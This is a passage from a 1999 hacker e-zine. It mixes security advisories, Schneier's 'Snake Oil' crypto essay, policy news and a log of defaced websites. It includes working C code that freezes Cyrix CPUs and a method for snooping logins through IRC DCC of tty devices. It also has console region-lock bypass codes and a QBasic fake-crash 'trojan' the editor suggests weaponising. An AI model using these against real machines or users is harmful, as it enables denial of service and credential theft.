Unfortunately, people sniffing the network who plug this hash into other tools take advantage of the weak design behind LANMAN [2] and retrieve the password of 'BOGUS!!' in under 1 minute. ----------- Conclusion : ----------- There are several good aspects to the Password Appraiser tool. Unfortunately they appear to be in the non-security critical components. The notion of sending such priveleged information [internal user passwords and hashes] across the public networks is problematic. If there is no attempt at encryption then the attack is kindergarden level. If there is some sort of encrypted sleeve (ie an SSL session) then the attack is elevated a level but still possible as anyone can spoof as the server and harvest password hashes. Certificates would raise the bar even further but the problem of end-node security comes into play. One has to trust that the pw.quakenbush.com server is more secure than their corporate firewall or other protective measures. While in many cases this might be true - there are undoubtedly cases where it is not. In these cases, since one has handed critical security information about internal systems, the overal security is lowered due to the weakest link. The only way we saw to avoid this problem was to enable the end user to be completely self contained and not reliant upon external sources for cracking passwords. The moniker "Who has the keys to your business [3]" takes on an entire new light given the vulnerabilities in this advisory. mudge@l0pht.com --------------- For more L0pht (that's L - zero - P - H - T) advisories check out: http://www.l0pht.com/advisories.html --------------- References: -- [1] quoted from Quakenbush web page at http://www.quakenbush.com/default.htm [2] information on some LANMAN hash weaknesses and other tools can be found at http://www.l0pht.com [3] "Who has the keys to your business" - Main slogan on http://www.quakenbush.com @HWA 07.2 Hackers Get Their Final Fantasy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The hacker community didn't waste any time on tweaking modded systems to work with Square's new RPG. February 12, 1999 Within the time it takes to blink, restless hackers and code busters figured out how to bypass the Japanese version of Square's Final Fantasy VIII lockout mechanism, according to several sources that contacted IGNPSX today. Prior to today, owners of modified PlayStations who bought an imported Japanese version of FFVIII found that the tamper-sensitive game would not play on their systems, in an attempt to prevent exporters and other like-minded folk from playing it outside of Japan. However, within less than a day, Asian companies have found a solution to this apparently minor technical obstacle. A chip is available for PlayStations with older systems and newer systems, and National Console Support (www.ncsx.com) is retailing the chips for $78. These will be available by Monday, February 12, according to NCS. Another solution has also been found, this one for Gameshark owners. For those who own Game Shark v2.0, several variations of code are available. D009B182 0000 8009B182 2402 For use with any Magic Key or Pro Action Replay to boot FFVIII: D009B1B8 6D09 8009B1B 8000 Here's a variant of the code: D009B1B A002 B009B1B A000 For the record, IGNPSX does not in any way promote piracy of games or tampering of your system. After all, modding your PlayStation will void your warranty. We do, however, like to promote great games. For those of you able to purchase an import version of Final Fantasy VIII -- and willing to forego one of the biggest aspects of the game, the story -- then we do recommend purchasing the import version. Similarly, we also recommend waiting for the North American version when it arrives this fall -- the IGNPSX staff. @HWA 08.0 dcc yerself some r00t ~~~~~~~~~~~~~~~~~~~~~ [ http://www.rootshell.com/ ] Date: Wed, 10 Feb 1999 14:24:55 -0800 (PST) From: Gregory Taylor <jest@ados.com> To: info@rootshell.com Subject: Re: New Exploit - DCCsnoop.txt Discovered by Gregory Taylor Febuary 5th, 1999 It is possible to snoop a user's Linux connection through IRC.. DCC Sending the device files /dev/ttyp1 - ? while someone is logged in on that ttyp to an outside client will send all information sent from that user to the target client, making it possible to snoop his connection, password and login The drawback is the user will not see his own information typed in and may disconnect, but for those with auto-login scripts, it is possible to recieve login/passwords, and even /dev/tty1 - etc. can be snooped for those logging in as root.. I would like some feedback on anyone who may have any ideas or comments about this. Gregory Taylor UNIX Systems Engineer American Digital Online Services --------------------------------------------------------------------------- - (877) ADOS.COM -- http://www.ados.com -- jest@ados.com ------------------ --------------------------------------------------------------------------- 09.0 Cyrix bug crashes cpus ~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG X-Homepage: http://personal.redestb.es/ragnar Date: Thu, 4 Feb 1999 16:50:21 +0100 Reply-To: Ragnar Hojland Espinosa <tech.support@REDESTB.ES> Sender: Bugtraq List <BUGTRAQ@netspace.org> From: Ragnar Hojland Espinosa <tech.support@REDESTB.ES> Subject: Cyrix bug: freeze in hell, badboy To: BUGTRAQ@netspace.org I emailed Cyrix a few months ago, and even managed to get a "oh, we will look at it" thanks to Rafael Reilova, but that was it till today.á A couple of people did report it, effectively, froze (most of) their Cyrix CPUs while running the opcodes below as non priviledged user. While I don't have the enough knowledge to assure this _is_ a CPU bug, it certainly looks like one to me (NO_LOCK isn't a workaround, btw). 0x804a368 <the_data>:áá cwtl 0x804a36a <the_data+2>: orlááá $0xe6ebe020,%eax 0x804a36f <the_data+7>: jleááá 0x804a368 <the_data> Here is the code (tested with linux, any version): /* Please compile without optimizations */ unsigned char the_data[] = { 62, 152, 13, 32, 224, 235, 230, 126, 247 }; void (*badboy)(); int main (int argc, char **argv) { áá badboy = (void(*)())(the_data); áá asm ("movl badboy,%eax"); áá asm ("call *%eax"); áá return 0; } If you try it, please send me your /proc/{cpuinfo,version} and if it freezes or not. -- ____/|á Ragnar Hojlandá (ragnar@lightside.ddns.org)ááááá Fingerprintá 94C4B \ o.O|áááááááááááááááááááááááááááááááááááááááááááááááááá 2F0D27DE025BE2302C =(_)=á "Thou shalt not follow the NULL pointer forááááá 104B78C56 B72F0822 áá Uáááá chaos and madness await thee at its end."áááááá hkp://keys.pgp.com 10.0 Intel's big brother id chips on the new Pentium III's ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* "The lawyers at Intel won't say it's foolproof but it is as foolproof as it can get." - Computer Associates vice-president J.P. Corriveau, on Intel's hardware security scheme for Pentium III's Chipping Away at Your Privacy News Opinion Contributed by Justin Hill http://www.ntsecurity.net/scripts/loader.asp?iD=/news/whatprivacy.htm An excerpt: "If having a retrievable serial number on your processor bugs you, then you'll sleep better knowing that a lot of hackers and crackers on the planet are going to be playing around with ways to prove just how easy it will be to steal your personal serial number without your knowledge -- doh! But on the flip side, if it's even remotely possible, they'll attempt to make software that can spoof the processor serial number when it's requested, so if your a privacy fanatic, you'll probably want to get a copy of that program if and when it appears - heh." Yes I think he's right ... and another short excerpt: "And if that's not a big enough dent to your already-almost-nonexistent- privacy, then you'll probably want to puke up your pizza when you learn that at least three states, South Carolina, Florida, and Colorado, have all made a rather thoughtless deal with a private business firm so that the firm may purchase some 22 million driver's license photos of private state citizens. That's right people, your governors were clinically brain dead that day, and now your picture might fall into the hands of whoever calls the shots at that private company -- all this and more for only pennies a photo. But wait, it gets even worse ;-]" Check out the whole article its an interesting read, http://www.ntsecurity.net/scripts/loader.asp?iD=/news/whatprivacy.htm * scooped from HNN (where else? krist those guys work hard ...) 11.0 Security Snake Oil ~~~~~~~~~~~~~~~~~~ ááááááSnake Oil The problem with bad security is that it looks just like good security. You can't tell the difference by looking at the finished product.á Both make the same security claims; both have the same functionality.á Both might even use the same algorithms: triple-DES, 1024-bit RSA, etc.áá Both might use the same protocols, implement the same standards, and have been endorsed by the same industry groups.á Yet one is secure and the other is insecure. Many cryptographers have likened this situation to the pharmaceutical industry before regulation.á The parallels are many: vendors can make any claims they want, consumers don't have the expertise to judge the accuracy of those claims, and there's no real liability on the part of the vendors (read the license you agree to when you buy a software security product). This is not to say that there are no good cryptography products on the market. There are.á There are vendors that try to create good products and to be honest in their advertising.á And there are vendors that believe they have good products when they don't, but they're just not skilled enough to tell the difference.á And there are vendors that are just out to make a quick buck, and honestly don't care if their product is good or not. Most products seem to fall into the middle category: well-meaning but insecure.á I've talked about the reason in previous CRYPTO-GRAM essays, but I'll summarize: anyone can create a cryptography product that he himself cannot break.á This means that a well-meaning person comes up with a new idea, or at least an idea that he has never heard of, cannot break it, and believes that he just discovered the magic elixir to cure all security problems.á And even if there's no magic elixir, the difficulty of creating secure products combined with the ease of making mistakes makes bad cryptography the rule. The term we use for bad cryptography products is "snake oil," which was the turn-of-the-century American term for quack medicine.á It brings to mind traveling medicine shows, and hawkers selling their special magic elixir that would cure any ailment you could imagine. For example, here is a paragraph from the most recent snake-oil advertisement I received in e-mail: "Encryptor 4.0 uses a unique in-house developed incremental base shift algorithm.á Decryption is practically impossible, even if someone manages to reverse engineer our program to obtain the algorithm, the decryption of a file depends on the exact password (encryption key).á Even if someone is guessing the encryption key the file will only be decrypted correctly if the encryption key is 100 percent correct.á See the IMPORTANT WARNING on our Web site http://ten4.com/encryptor."á I checked the Web site; the odds that this product is any good are negligible. Elsewhere I've talked about building strong security products, using tried-and-true mathematics, and generally being conservative.á Here I want to talk about some of the common snake-oil warning signs, and how you can pre-judge products from their advertising claims.á These warning signs are not foolproof, but they're pretty good. Warning Sign #1: Pseudo-mathematical gobbledygook.á In the quote above, notice the "unique in-house developed incremental base shift algorithm."á Does anyone have any idea what that means?á Are there any academic papers that discuss this concept?á Long noun chains don't automatically imply security. Meganet <http://www.meganet.com> has a beauty on their Web site: "The base of VME is a Virtual Matrix, a matrix of binary values which is infinity in size in theory and therefore have no redundant value.á The data to be encrypted is compared to the data in the Virtual Matrix.á Once a match is found, a set of pointers that indicate how to navigate inside the Virtual Matrix is created.á That set of pointers (which is worthless unless pointing to the right Virtual Matrix) is then further encrypted in dozens other algorithms in different stages to create an avalanche effect. The result is an encrypted file that even if decrypted is completely meaningless since the decrypted data is not the actual data but rather a set of pointers.á Considering that each session of VME has a unique different Virtual Matrix and that the data pattern within the Virtual Matrix is completely random and non-redundant, there is no way to derive the data out of the pointer set."á This makes no sense, even to an expert. US Data Security <http://www.usdsi.com> has another beauty: "From a mathematical point of view, the TTM algorithm is intuitively natural and less cumbersome to use than methods that are number-theory based." SuperKrypt <http://www.superkrypt.com/> tries to impress with an acronym: "SuperKrypt products utilize the DNGT bulk encryption method," whatever that is.á And Cennoid <http://www.cennoid.com> just doesn't understand what it's talking about: "Since key length and key structure vary and since the encryption engine does not use any mathematical algorithms, reverse engineering is impossible and guessing is not an option." The point here is that, like medicine, cryptography is a science.á It has a body of knowledge, and researchers are constantly improving that body of knowledge: designing new security methods, breaking existing security methods, building theoretical foundations, etc.á Someone who obviously does not speak the language of cryptography is not conversant with the literature, and is much less likely to have invented something good.á It's as if your doctor started talking about "energy waves and healing vibrations."á You'd worry. Warning Sign #2: New mathematics. Every couple of years, some mathematician looks over at cryptography, says something like, "oh, that's easy," and proceeds to create an encryption algorithm out of whatever he has been working on.á Invariably it is lousy.á Beware cryptography based on new paradigms or new areas of mathematics: chaos theory, neural networks, coding theory, zeta functions.á Cryptography is hard; the odds that someone without any experience in the field can revolutionize it are small.á And if someone does, let the academic community have a few years to understand it before buying products based on it. Warning Sign #3: Proprietary cryptography. I promise not to start another tirade about the problems of proprietary cryptography.á I just include it here as a warning sign.á So when a company like GenioUSA <http://www.geniousa.com/genio/> refuses to divulge what algorithm they're using (they claim it's "world class secret key encryption," whatever that means), you should think twice before using their product (it's completely broken, by the way). Another company, Crypt-o-Text <http://www.savard.com/crypt-o-text/>, promises a "complex proprietary encryption algorithm" and that "there is absolutely no way to determine what password was used by examining the encrypted text."á It was completely broken in an InfoWorld review. This kind of thing isn't exclusive to small companies.á Axent once tried to pass XOR off as a real encryption algorithm.á It wasn't until some peeked inside the compiled code that we discovered it. Any company that won't discuss its algorithms or protocols has something to hide.á There's no other possible reason.á (And don't let them tell you that it is patent-pending; as soon as they file the patent, they can discuss the technology.á If they're still working on the patent, tell them to come back after they can make their technology public.) Warning Sign #4: Extreme cluelessness. Some companies make such weird claims that it's obvious that they don't understand the field.á TriStrata says this about their encryption algorithm:á "Since TriStrata's encryption scheme is so simple and of such low computational complexity, the client portion can reside on a wide range of systems -- from a server to a portable PC."á Don't they realize that every encryption algorithm is small enough to fit on a portable PC, that DES and RSA and SHA can fit on an 8-bit smart card, and that you can implement some of the AES candidates in 17 clock cycles per byte or a few thousand gates? GenioUSA talks about why they don't use public-key cryptography in their product): "Public Key encryption is exactly that, you are not the only party involved in the generation, integrity, and security of all the keys/passwords used to encrypt your e-mail, documents, and files.á Public key encryption is great technology to use to exchange things with anyone you won't trust with your secret key(s) and/or can't exchange secret key(s) with.á We quote one sentence from a well known Web page, 'All known public key cryptosystems, however, are subject to shortcut attacks and must therefore use keys ten or more times the lengths of those discussed here to achieve the an [sic] equivalent level of security.'"á So what?á This company just doesn't get it. Warning Sign #5: Ridiculous key lengths. Jaws Technology <http://www.jawstech.com> boasts: "Thanks to the JAWS L5 algorithm's statistically unbreakable 4096 bit key, the safety of your most valued data files is ensured."á Meganet takes the ridiculous a step further <http://www.meganet.com>: "1 million bit symmetric keys -- The market offer's [sic] 40-160 bit only!!" Longer key lengths are better, but only up to a point.á AES will have 128-bit, 192-bit, and 256-bit key lengths.á This is far longer than needed for the foreseeable future.á In fact, we cannot even imagine a world where 256-bit brute force searches are possible.á It requires some fundamental breakthroughs in physics and our understanding of the universe.á For public-key cryptography, 2048-bit keys have same sort of property; longer is meaningless. Think of this as a sub-example of Warning Sign #4: if the company doesn't understand keys, do you really want them to design your security product? Warning Sign #6: One-time pads. One-time pads don't make sense for mass-market encryption products.á They may work in pencil-and-paper spy scenarios, they may work on the U.S.-Russia teletype hotline, but they don't work for you.á Most companies that claim they have a one-time pad actually do not.á They have something they think is a one-time pad.á A true one-time pad is provably secure (against certain attacks), but is also unusable. Elementrix, now defunct, announced a one-time pad product a few years ago, and refused to recant when it was shown that it was no such thing.á Ciphile Software <http://www.ciphile.com> just tries to pretend: "Original Absolute Privacy - Level3 is an automated pseudo one-time pad generator with very sophisticated and powerful augmenting features."á Whatever that means. More recently, TriStrata <http://www.tristrata.com> jumped on the world's cryptography stage by announcing that they had a one-time pad.á Since then, they've been thoroughly trounced by anyone with a grain of cryptographic sense and have deleted the phrase from their Web site.á At least they've exhibited learning behavior. Ultimate Privacy <http://www.ultimateprivacy.com> might actually use a one-time pad (although they claim to use Blowfish, too, which worries me): "The one time pad is a private key method of encryption, and requires the safe and secure distribution of the pad material, which serves as the key in our solution.á The security of the key distribution comes down to how secure you want to be -- for communicating point-to-point with one other person, we suggest a face-to-face hand-off of the pad material."á Remember that you need to hand off the same volume of bits as the message you want to send, otherwise you don't have a one-time pad anymore. Warning Sign #7: Unsubstantiated claims. Jaws Technologies says this about its new encryption technology: "This scientifically acclaimed encryption product is the world's strongest commercially available software of its kind."á Acclaimed by who?á The Web site doesn't say.á World's strongest by what comparison?á Nothing. UBE98, at <http://www.parkie.ndirect.co.uk/>, stands for "unbreakable encryption," or at least it did before someone took a day to break it.á Its Web site makes the same sort of ridiculous claims:á "One of the Strongest Encryptions available in the UK in a program that everyone will understand how to use!"á Wow.á SenCrypt <http://www.ionmarketing.com/> is advertised to be "the most secure cryptographic algorithm known to mankind."á Double wow. Some companies claim "military-grade" security.á This is a meaningless term.á There's no such standard.á And at least in the U.S., military cryptography is not available for non-government purposes (although government contractors can get it for classified contracts). Other companies make claims about other algorithms that are "broken," without giving details.á Or that public-key cryptography is useless.á Don't believe any of this stuff.á If the claim seems far-fetched, it probably is. If a company claims that their products have been reviewed by cryptographers, ask for names.á Ask for a copy of the review.á Counterpane Systems reviews many products, and our clients can give out the reviews if they choose. Warning Sign #8: Security proofs. There are two kinds of snake-oil proofs.á The first are real mathematical proofs that don't say anything about real security.á The second are fake proofs.á Meganet claims to have a proof that their VME algorithm is as secure as a one-time pad.á Their "proof" is to explain how a one-time pad works, add the magic spell "VME has the same phenomenon behavior patterns, hence proves to be equally strong and unbreakable as OTP," and then give the results of some statistical tests.á This is not a proof.á It isn't even close. More subtle are actual provably secure systems.á They do exist.á Last summer, IBM made a big press splash about their provably secure system, which they claimed would revolutionize the cryptography landscape.á (See <http://www.counterpane.com/crypto-gram-9809.html#cramer-shoup> for a discussion.)á Since then, the system has disappeared.á It's great research, but mathematical proofs have little to do with actual product security. Warning Sign #9: Cracking contests. I wrote about this at length last December: <http://www.counterpane.com/crypto-gram-9812.html#contests>.á For now, suffice it to say that cracking contests are no guarantee of security, and often mean that the designers don't understand what it means to show that a product is secure. Conclusion: Separating the Good from the Bad These snake-oil warning signs are neither necessary nor sufficient criteria for separating the good cryptography from the snake oil.á Just as there could be insecure products that don't trigger any of these nine warning signs, there could be secure products that look very much like snake oil. But most people don't have the time, patience, or expertise to perform the kind of analysis necessary to make an educated determination.á In the absence of a Food-and-Drug-Administration-like body to regulate cryptography, the only thing a reasonable person can do is to use warning signs like these as guides. Further reading: The "Snake Oil" FAQ is an excellent source of information on questionable cryptographic products, and a good way to increase the sensitivity of your bullshit detector.á Get your copy at: <http://www.interhack.net/people/cmcurtin/snake-oil-faq.html>. @HWA 11.1 U.S has new interim crypto legislature ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Ed, from CryptoGram a newsletter for all things crypto The U.S. has new interim cryptography export regulations.á The Department of Commerce issued new interim regulations on encryption export controls on December 31, 1998.á Products with DES can now be freely exported.á (Of course, we all know that DES can be broken in 21 hours by a bunch of amateurs, and a lot faster by professionals.)á Products with any key length can be exported to insurance companies, medical end-users, and online merchants (only for buying and selling goods), under the current exception available for banks.á Corporations can export to their subsidiaries for "internal company proprietary use"; some of this extends to partners of American companies.á Some of the licensing requirements on export of key escrow/key recovery systems have been removed.á These new regulations, announced in September, are targeted towards large corporations. Restrictions on the exports of strong encryption used for private, non-commercial reasons is still strictly limited.á Comments on the rules are due March 1, 1998.á A copy of the rules is available at: http://www.epic.org/crypto/export_controls/bxa-regs-1298.html France reversed its long-standing position as being one of the most anti-cryptography countries in the world.á On January 19, Prime Minister Lionel Jospin announced the French government is relaxing its current restrictive policy on encryption.á Under the new policy, a key escrow system of "Trusted Third Parties" will no longer be required for domestic use, the 1996 law requiring TTPs will not be implemented, and users will be able to use up to 128-bit encryption without restrictions until a new law which eliminates all restrictions is enacted.á Rah rah.á The announcement is available in French at: http://www.premier-ministre.gouv.fr/PM/D190199.HTM http://www.internet.gouv.fr/francais/textesref/cisi190199/decis1.htm http://www.internet.gouv.fr/francais/textesref/cisi190199/decis2.htm and a translation is at: http://slashdot.org/articles/99/01/19/1255234.shtml In addition to adding a unique processor ID (see below) to its Pentium III chip, Intel is adding a hardware random number generator.á This is excellent news.á I know nothing about how it works (or even if it is any good), but using techniques such as Yarrow, we can take even a mediocre hardware random number generator and turn it into something that is good for cryptographic applications. There's a new Word-based virus named Caligula.á Caligula steals a user's PGP key ring and sends it to the creators' FTP site.á According to Network Associates (owners of PGP, having bought it in 1997), this doesn't compromise PGP security because the key ring file is useless without the passphrase.á This seems a bit optimistic; once the private key ring is known, PGP's security level goes from unbreakable to that of a standard hashed passphrase.á And most people choose lousy passphrases. http://www.techweb.com/wire/story/TWB19990205S0011 Sun's Scott McNealy announced that we all have no privacy anyway, and might as well get used to it.á All the more troubling, Sun is a member of the Online Privacy Alliance.á With an attitude like McNealy's, is it hard to believe that "an industry coalition that seeks to head off government regulation of online consumer privacy in favor of an industry self-regulation approach" has my best interests at heart? http://www.wired.com/news/news/politics/story/17538.html SECRET POWER is an excellent book about project Echelon, the NSA's secret program designed to eavesdrop on pretty much every piece of communication in the world.á The book isn't available in the U.S. (Amazon.com never heard of it, and I got my copy from a friend in New Zealand), but CovertAction Quarterly has an excellent article on the topic by the author: http://www.caq.com/caq59/CAQ59GlobalSnoop.html And if you want to try to get the book, here are the details:á Nicky Hager, SECRET POWER, Craig Potton Publishing (Box 555, Nelson, New Zealand), 1996. See also:á http://www.gn.apc.org/duncan/echelon-dc.htm 12.0 The Hacker Challenge by Qubik ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Hacker Challenge By: Qubik (qubik@bikkel.com) originally posted on HNN in BufferOverflow. You have probably read about them and some of you may have even participated in one or two. Hacker challenges; where your asked to bypass the latest security measure implemented into technology which is already, prior to testing, dubbed as the latest in computer protection. But for what in return? Most challenges offer a reward of some sorts, a reward which is more often than not, a five or six figure with a dollar sign placed neatly at the beginning. So just what is the deal with these challenges? What purpose do they really serve and are they just marketing ploys? I'd like you to imagine for a moment that you're an administrator of a small corporate network. It's not the most exciting of jobs, and you don't have time to keep up with the latest going ons in the security scene. Your network has been attacked a few times before, and you start to think about upgrading your security. So where do you start? Where else would you start, but the internet? It's the worlds largest resource, and every good company dealing with network security, is bound to be on the internet somewhere. So you use a search engine or two and you come across a web site for a new state of the art firewall, who's manufacturers claim it resisted every hacker that attempted to hack it at a recent hacker convention. Your amazed, surely their high price tag is nothing for complete security!? Only what if it is all a clever ploy, haven't you got to ask yourself just how many people actually tried to hack into that particular piece of software? Haven't you got to look into the reputation of the manufacturer? Of course you do! To be sure, you've got to ask for the cold hard facts, not the marketing babble! There are serious flaws in many hacker challenges, not the least being that most 'real' hackers only hear about them after they've finished. This makes you wonder just who took part, and how they found out about it. It's not uncommon for hackers and security analysts to earn wages in excess of six figures, and to earn such wages, you've got to be either very lucky, or very busy. So what's your guarantee that a hacker who actually knows what he is doing, actually took the time out to earn a, comparatively, small ten thousand? You have no guarantee at all, why on earth should he or she bother? Next ask yourself whether real hackers would want to find all those bugs in that new technological innovation. Surely their only going to end up making their job, of hacking, harder by pointing them out? However, A low level source code analysis of a piece of software or a close look at hardware by reputable third party security analysis company will delay product ship times and cost a lot more than setting up a hacker challenge. Not to mention that it has nowhere near the same marketing punch. Display your product at an upcoming convention and let people bang on it for a weekend and then claim "Product X survives Hacker Challenge." Makes a great press release. It all seems rather corrupt, with companies hiding the truth and rubbing their hands at the millions they make. A ten thousand dollar reward seems rather pathetic, when your earning ten times that kind of money. Surely these companies know this, are they in fact attempting to social engineer the hackers or maybe worse their customers? But it's not all like that, there are plenty of genuine challenges out there. Some have been set up to test software and, now more and more, hardware, others testing entire networks. For example, recently the Quebec government is enlisting the aid of hackers to test its networks and to research new ways of protecting those networks. So what can we say about hacker challenges? Do they really prove how secure a product is? I don't think so, the fact that most aren't officially announced to the hacker public and that they are often deliberately misinterpret, doesn't give a good impression. But then, who should a company go to? It's not the easiest of tasks in the world, to announce such a challenge. Hack at your own discretion, don't be afraid to take part in a hacker challenge, but don't take the word of the manufacturer, when they say it's secure, just because a few passers by a convention typed a few keys on a keyboard. There will always be flaws in hardware and software, it's up to us to the true hacker to find and fix them, whether we do it for the companies maketing campaign, or for personal gratification. 13.0 #13 A BASIC Trojan, ~~~~~~~~~~~~~~~~~~~ Type it in and run it .. in this form its benign but once compiled with a nasty bit (use your imagination) it can do anything u want it to... - Ed <SNIP> ' written in Qbasic 2.0 ' public domain 1989 Cruciphux ' warning bogus 'code' follows; randomize timer print "C:\" print "Drive error, fat unreadable." input "press any key to restart.";a$ shell "dir" 1 a$=inkey$ if a$="" goto 1 i=150 2 print "Volume in dri e C has no labe" print "Directory of C:\⌠°╪Çsucker" for xx=1 to 500:next for t=1 to 20 close 1:open "O",1,"xxxxxxxx.xxx" print #1,"x" b=int(24*rnd+1) for x = 1 to b a=int(i*rnd+1) if a<>12 then print chr$(a); next:next goto 1 <SNIP> I know its lame but I know some of you will have fun with this ... ;-) @HWA AD.S ADVERTISING. The HWA black market ADVERTISEMENTS. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** IT HAS BEEN FOUR YEARS! *** F R E E M I T N I C K **NOW!** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre To place an ad in this section simply type it up and email it to hwa@press,usmc.net, put AD! in the subject header please. - Ed H.W Hacked websites ~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like H.A.R.P, go get em boyz racism is a mugs game! - Ed Feb 20th 1999 When I visited www.hackernews.com today I was greeted with this: Index of / Name Last modified Size Description [DIR] Parent Directory 20-Feb-99 01:14 - Were they hacked? www.l0pht.com is not answering HTTP requests... more on this when we find out what went down. - Ed http://www.200cigarettes.com/ Contributed by Spikeman Feb 20th 1999- Crappy Movies - Frequently Asked Questions Why does MTV suck? MTV sucks because they play crappy videos and they have stupid television shows which are harder to watch than the insipid movies they endorse. The only programing station worse than MTV is WB. I often wonder what is harder to watch: MTV's The Real Worl d and its cast of cretins or Moesha. That's probably because I watch too much TV to begin with. But that's another issue all together. You guys seem pretty knoweldgable about what sucks and what doesn't, where can I talk to you guys to find out more? irc.psychic.com It's cool there. Uhm, yeah. Why did you guys hack the 200 Cigarettes web site? The movie isn't even out yet. Because we know it will suck. MTV endorses it, thusly, it sucks. Courtney Love is in it, thusly, it will suck. Robert Deniro is not in it, thusly, it will suck. It's another Gen-Xish type movie that I find very insulting. What ever happened to quality movies about serial killers and mobsters blowing each other up? I don't give a shit about some crappy bar scene in some far away, imaginary candyland that Paramount created to make them millions of dollars off rich, suburban white kids with too much ti me and apparently too much money on their hands. Who is that guy on MTV's Road Rules that wears the r00t hat? No clue. But whoever he is he's not a very snappy dresser and he seems to have a little trouble in social situations. He also seems to have difficulties communicating effectively with the sista among them. I like how MTV always sticks in their token black person, or token asian person, or token gay person, to fill the show out so it's a little more P.C.. It's pretty cool how there's always some white person that likes to fight with the token black person all the while MTV capitalizes off of it. And, honestly, would you wear that r00t hat in public? If the answer is yes, please stop reading this, get up, go outside and lie down in the street until a car runs you over and your brains squirt out all over the road causing many accidents and traffic delays. Because you are a dork. Where should I go to meet you guys again? irc.psychic.com Aren't you guys going to speak spanish and talk about Venezuela or some other opressed South American country? Yes. Arriba la raza. Yo quiero Taco Bell. And free Venezuela or something. Who else should we free? Kevin Mitnick, Mumia Abu-Jamal and Truman. Oh wait, Truman got out at the end. Okay, scratch the Truman thing. I wonder how much Jim Carrey got paid for that movie. I'm sure it's too much. Courtney Love is looking kinda skanky, how do you guys feel about her doing movies? The People vs. Larry Flynt was good, with no thanks from her, if ya ask me. Courtney Love is not only a crappy actress, but she's a crappy singer/guitarist and her band sucks too. Kurt Kaboom wasn't as great as everyone thinks as well. Neither was Tupac now that we're on the subject of celebrities who have died from gunshot wounds. Stupid celebrities. What other celebrities died of gunshot wounds? I don't know. I think that guy who played Hogan on Hogan's heroes did. JFK did. Abraham Lincoln, does he count? Robert Kennedy. Biggie Smalls. The old bass player from Metallica had a bus fall on his head. That's kinda cool. Does he count? Where again? irc.psychic.com Will you guys keep on hacking movie sites to tell us they suck? Most likely. You guys rock, can I have your autographs. No. Please go to irc.psychic.com and tell us how lame we are and that we're not as badass as we think. Once again: - this page hacked by MagicFX - this page written by boomy GREETS BY MAGICFX TO: - The FBI (can I work for you guys?) - The CIA (I guess I'm lucky you fellows don't care about movie hacks.) - The NSA (Can I have one of your computers? C'mon, you got plenty!) and: All my friends :) SHOUT OUTS BY BOOMY TO: - VH1, for not putting out crappy movies like MTV. EoA Feb 19th 1999 contributed by lsd44 S C R E A M of H.A.R.P (Hackers Against Racist Parties) has cracked whitepower.com. This is the same person who cracked the Klu Klux Klan a few days ago. Whitepride.com HNN Cracked Pages Archive HNN recieved reports that the following sites had been cracked: http://www.andygrace.com http://www.netatnite.com http://home.serve.net Feb17th 1999 Collected by sAs- Contributed by dunkelsite from HNN http://www.hackernews.com/ Venezuela Cracked At dawn local time on February 16, 1999, www.cordiplan.gov.ve and www.ipasme.gov.ve where cracked by ^^DarDdEath^^ and Dunkelseite respectively. In both cases the home page was changed to protest against bad government, corruption and the suffering of 80% of the Venezuelans who live in critical poverty. HNN Cracked Pages Archive (url:http://www.hackernews.com/archive/crackarch.html) Central Office of Coordination and Planning (url:http://www.cordiplan.gov.ve) Collected by sAs- Feb 15th contributed by Anonymous from HNN Cracked (From HNN http://www.hackernews.com/ rumours section) We have recieved reports that the following sites have been cracked by the following people. hakb0y, opt1mus, RazaMExicana http://harry.lbl.gov http://www.cbvm.net http://www.yauni.co.kr http://www.bcb.gov.bo http://work.go.kr @HWA _________________________________________________________________________ A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- ⌐ 1998, 1999 (c) Cruciphux/HWA.hax0r.news (r) Cruciphux is a trade mark of Huge Whales of Armenia -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- Hackerz Without Attitudez Information Warfare Alliance Website Opening soon: www.hwa-iwa.org --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- 